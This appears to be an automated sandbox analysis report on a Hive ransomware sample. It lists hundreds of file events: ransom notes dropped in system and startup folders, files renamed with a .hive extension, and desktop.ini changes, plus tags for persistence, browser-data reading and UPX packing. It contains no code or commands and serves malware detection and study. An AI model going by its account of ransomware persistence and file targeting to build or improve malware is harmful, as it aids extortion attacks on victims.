File created C:\Windows\System32\drivers\en-US\HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File created C:\Windows\SysWOW64\drivers\fr-FR\HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File created C:\Windows\SysWOW64\drivers\ja-JP\HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File created C:\Windows\System32\drivers\UMDF\fr-FR\HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File created C:\Windows\SysWOW64\drivers\HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File created C:\Windows\System32\drivers\UMDF\uk-UA\HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File created C:\Windows\System32\drivers\de-DE\HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File created C:\Windows\System32\drivers\etc\HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File created C:\Windows\System32\drivers\fr-FR\HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File created C:\Windows\System32\drivers\HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File created C:\Windows\System32\drivers\uk-UA\HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A

Boot or Logon Autostart Execution: Print Processors

persistence
Description Indicator Process Target
File created C:\Windows\System32\spool\prtprocs\x64\HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A

Drops startup file

Description Indicator Process Target
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\desktop.ini.P7EsMTWem2f4DapaPblE9Nbz88yP_gFc7vvnpVOSdzs.hive C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File created C:\Users\Admin\AppData\Roaming\Microsoft\Word\STARTUP\HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A

Reads user/profile data of web browsers

spyware stealer

UPX packed file

upx
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Drops desktop.ini file(s)

Description Indicator Process Target
File opened for modification C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessibility\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File opened for modification C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File opened for modification C:\Users\Admin\3D Objects\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File opened for modification C:\Users\Admin\AppData\Local\Microsoft\Windows\WinX\Group3\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File opened for modification C:\Users\Admin\Pictures\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File opened for modification C:\Users\Admin\Documents\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File opened for modification C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File opened for modification C:\Users\Admin\AppData\Local\Microsoft\Windows\Application Shortcuts\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Administrative Tools\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Maintenance\Desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File opened for modification C:\ProgramData\Microsoft\Windows\Start Menu\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File opened for modification C:\Users\Admin\AppData\Local\Microsoft\Windows\Burn\Burn2\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\SendTo\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File opened for modification C:\Users\Admin\Saved Games\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File opened for modification C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\Desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File opened for modification C:\Users\Public\Downloads\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File opened for modification C:\Users\Public\Pictures\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Office16\1033\DataServices\DESKTOP.INI C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessibility\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File opened for modification C:\Users\Admin\Desktop\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File opened for modification C:\Users\Admin\Favorites\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File opened for modification C:\Users\Public\AccountPictures\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File opened for modification C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessibility\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File opened for modification C:\Users\Admin\AppData\Local\Microsoft\Windows\History\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File opened for modification C:\Users\Public\Music\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File opened for modification C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Maintenance\Desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File opened for modification C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\System Tools\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Libraries\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File opened for modification C:\Users\Admin\Links\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File opened for modification C:\Users\Public\Libraries\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File opened for modification C:\Users\Public\Videos\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File opened for modification C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Maintenance\Desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File opened for modification C:\Users\Public\Desktop\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File opened for modification C:\Users\Admin\AppData\Local\Microsoft\Windows\WinX\Group1\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\Desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File opened for modification C:\Users\Admin\Contacts\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File opened for modification C:\Users\Default\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File opened for modification C:\Users\Default\AppData\Local\Microsoft\Windows\WinX\Group2\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File opened for modification C:\Users\Default\AppData\Roaming\Microsoft\Windows\SendTo\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File opened for modification C:\Users\Admin\Pictures\Camera Roll\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File opened for modification C:\Users\Admin\Searches\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File opened for modification C:\Users\Admin\Videos\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File opened for modification C:\Users\Default\AppData\Local\Microsoft\Windows\WinX\Group1\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File opened for modification C:\Users\Public\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File opened for modification F:\$RECYCLE.BIN\S-1-5-21-2539840389-1261165778-1087677076-1000\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File opened for modification C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Windows PowerShell\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File opened for modification C:\Users\Admin\OneDrive\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File opened for modification C:\Users\Admin\Pictures\Saved Pictures\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File opened for modification C:\Users\Admin\AppData\Local\Microsoft\Windows\WinX\Group2\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File opened for modification C:\Users\Admin\Downloads\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File opened for modification C:\Users\Admin\Favorites\Links\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File opened for modification C:\Users\Default\AppData\Local\Microsoft\Windows\WinX\Group3\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File opened for modification C:\Users\Public\Documents\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File opened for modification C:\ProgramData\Microsoft\Windows\Start Menu\Programs\System Tools\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File opened for modification C:\Program Files\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File opened for modification C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Administrative Tools\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File opened for modification C:\ProgramData\Microsoft\Windows\Start Menu\Programs\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\AccountPictures\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A

Drops file in System32 directory

Description Indicator Process Target
File created C:\Windows\SysWOW64\Speech\SpeechUX\es-ES\HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File created C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\SecureBoot\de-DE\HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File created C:\Windows\System32\DriverStore\FileRepository\vhdmp.inf_amd64_aa94d04ecf56de1f\HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File created C:\Windows\System32\WindowsPowerShell\v1.0\Modules\PSDesiredStateConfiguration\DSCResources\MSFT_UserResource\es-ES\HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File created C:\Windows\System32\WindowsPowerShell\v1.0\Modules\PSDesiredStateConfiguration\DSCResources\MSFT_WaitForAll\HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File created C:\Windows\SysWOW64\InstallShield\setupdir\0804\HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File created C:\Windows\SysWOW64\uk-UA\Licenses\Volume\Professional\HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File created C:\Windows\System32\DriverStore\FileRepository\mdmusrg.inf_amd64_bb7c44c7bb3664d0\HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File created C:\Windows\System32\es-ES\Licenses\Volume\HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File created C:\Windows\SysWOW64\wbem\Repository\HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File created C:\Windows\System32\Printing_Admin_Scripts\ja-JP\HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File created C:\Windows\SysWOW64\fr-FR\Licenses\_Default\HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File created C:\Windows\SysWOW64\ja-JP\Licenses\_Default\HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File created C:\Windows\System32\DriverStore\FileRepository\iai2c.inf_amd64_a77c815b2999404d\HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File created C:\Windows\System32\DriverStore\FileRepository\mdmcrtix.inf_amd64_e3ded2b26d662526\HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File created C:\Windows\System32\IME\IMEKR\APPLETS\HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File created C:\Windows\System32\Tasks\Microsoft\Windows\PLA\HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File created C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\fr-FR\HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File created C:\Windows\System32\spool\drivers\W32X86\HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File created C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.ODataUtils\it-IT\HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File created C:\Windows\System32\DriverStore\FileRepository\c_unknown.inf_amd64_9f92c189b415c003\HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File created C:\Windows\System32\DriverStore\FileRepository\hal.inf_amd64_fd0ae947345ac7bf\HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File created C:\Windows\System32\DriverStore\FileRepository\rdpbus.inf_amd64_05ebd3b4422f62ba\HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File created C:\Windows\System32\Speech\Common\fr-FR\HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File created C:\Windows\System32\Tasks\Microsoft\OneCore\DirectX\HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File created C:\Windows\System32\WindowsPowerShell\v1.0\Modules\Whea\en-US\HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File created C:\Windows\System32\migwiz\replacementmanifests\WindowsSearchEngine\HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File created C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AssignedAccess\de-DE\HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File created C:\Windows\SysWOW64\WindowsPowerShell\v1.0\de-DE\HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File created C:\Windows\SysWOW64\sppui\HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File created C:\Windows\System32\Speech\Common\en-US\HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File created C:\Windows\System32\spp\tokens\HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File created C:\Windows\System32\DriverStore\FileRepository\c_fscopyprotection.inf_amd64_9c108d8ac558a80d\HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File created C:\Windows\System32\DriverStore\FileRepository\mdmfj2.inf_amd64_167948d0c94abc27\HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File created C:\Windows\System32\DriverStore\FileRepository\stornvme.inf_amd64_1218fad01506b7af\HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File created C:\Windows\System32\DriverStore\FileRepository\tsusbhub.inf_amd64_bd91a147ab4ebf1c\HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File created C:\Windows\System32\WindowsPowerShell\v1.0\Modules\NetworkSwitchManager\fr-FR\HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File created C:\Windows\SysWOW64\Com\dmp\HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File created C:\Windows\SysWOW64\Licenses\neutral\OEM\Professional\HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File created C:\Windows\SysWOW64\ja-JP\Licenses\_Default\Professional\HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File created C:\Windows\System32\DriverStore\FileRepository\c_extension.inf_amd64_7891c7d003f5e96b\HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File created C:\Windows\System32\DriverStore\FileRepository\fidohid.inf_amd64_c446be9403cdcdb1\HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File created C:\Windows\System32\Speech\SpeechUX\uk-UA\HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File created C:\Windows\System32\WCN\ja-JP\HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File created C:\Windows\System32\WindowsPowerShell\v1.0\Modules\Kds\en-US\HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File created C:\Windows\System32\config\systemprofile\AppData\Local\tw-c28-c2c-2f6b.tmp\HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File created C:\Windows\System32\ko-KR\HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File created C:\Windows\SysWOW64\Tasks\Microsoft\Windows\PLA\System\HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File created C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\PSDesiredStateConfiguration\DSCResources\MSFT_UserResource\en-US\HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File created C:\Windows\SysWOW64\ja-JP\Licenses\HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File created C:\Windows\System32\Boot\en-US\HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File created C:\Windows\System32\Configuration\Registration\MSFT_FileDirectoryConfiguration\ja-JP\HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File created C:\Windows\System32\DriverStore\FileRepository\bthleenum.inf_amd64_11f9ff6c12dbf9b5\HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File created C:\Windows\System32\InputMethod\CHT\HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File created C:\Windows\System32\config\systemprofile\AppData\Local\tw-d60-d90-a182.tmp\HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File created C:\Windows\System32\DriverStore\FileRepository\rspndr.inf_amd64_4e80c2bb5314f071\HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File created C:\Windows\System32\Speech\Engines\SR\fr-FR\HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File created C:\Windows\System32\WDI\{86432a0b-3c7d-4ddf-a89c-172faa90485d}\{6f126544-600f-4756-8792-b71c4e30f413}\HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File created C:\Windows\System32\WindowsPowerShell\v1.0\Modules\PSDesiredStateConfiguration\DSCResources\MSFT_GroupResource\en-US\HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File created C:\Windows\SysWOW64\pl-PL\HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File created C:\Windows\System32\DriverStore\FileRepository\c_fsencryption.inf_amd64_b4b4845819a23338\HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File created C:\Windows\System32\WindowsPowerShell\v1.0\Modules\PSDesiredStateConfiguration\DSCResources\MSFT_WaitForAny\fr-FR\HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File created C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Windows\History\HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
File created C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\PSDesiredStateConfiguration\DSCResources\MSFT_WindowsOptionalFeature\uk-UA\HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A

Drops file in Program Files directory

Description Indicator Process Target
File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\Standard2019VL_MAK_AE-ul-phn.xrm-ms.P7EsMTWem2f4DapaPblE9JLMqb0GT-MsqSXfDBplsgc.hive C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Hive_17_07_2021_808KB.exe N/A
